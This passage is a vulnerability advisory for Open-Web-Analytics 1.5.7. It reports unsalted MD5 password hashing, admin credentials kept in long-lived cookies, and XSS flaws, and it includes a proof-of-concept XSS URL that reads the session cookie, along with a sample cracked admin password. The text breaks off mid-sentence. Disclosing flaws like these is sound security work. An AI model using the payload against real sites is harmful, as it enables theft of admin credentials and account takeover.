[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-OPENWEBANALYTICS0721.txt Vendor: ================================ www.openwebanalytics.com Product: ================================ Open-Web-Analytics-1.5.7 Advisory Information: ======================================================= Cryptographic, Password Disclosure & XSS Vulnerabilities Vulnerability Details: ===================== Cryptographic Weakness: ----------------------- Passwords are stored in the database using MD5 hash algorithm NON salted, we find in owa_lib.php, public static function encryptPassword($password) { return md5(strtolower($password).strlen($password)); } Password Disclosure: -------------------- In owa_auth.php on line 329 we find saveCredentials() PHP function which saves the username & password as browser domain cookie leaving us direct access via XSS attack. function saveCredentials() { $this->e->debug('saving user credentials to cookies'); setcookie($this->config['ns'].'u', $this->u->get('user_id'), time()+3600*24*365*10, '/', $this->config['cookie_domain']); setcookie($this->config['ns'].'p', $this->u->get('password'), time()+3600*24*30, '/', $this->config['cookie_domain']); } XSS: ---- Application is vulnerable to XSS So, now we can access the Admin username & password credentials from our XSS attack, do a window.open() or whatever and send to a remote server then come back and login after performing offline crack of the hash. Since we cannot seem to echo the password using document.cookie we will use window.document['cookie'] to gain access to admin password. The application uses the admin username and password as persistant browser cookies which is our dream come true! e.g. retrieved username & passwd via XSS ( owa_u=admin; owa_p=76ffbb8d470d6a402b3c429f35be8a1a ) user: admin / passwd: abc123 Also a second XSS vector exists in Install PHP script via POST request in the Email address field. Exploit code(s): ================ XSS(s) POC: 1- Steal username & password XSS, in this example we inject our malicious payload into the middle of the site ID hash. http://localhost/Open-Web-Analytics-1.5.7/Open-Web-Analytics-1.5.7/index.php?owa_do=base.sitesInvocation&owa_siteId=e9144cf4%22/%3E%22--%3E%3CDIV%20id=%27HELL%27%20onMouseMove=alert%28window.document[%27cookie%27]%29;%3C!-- Injecting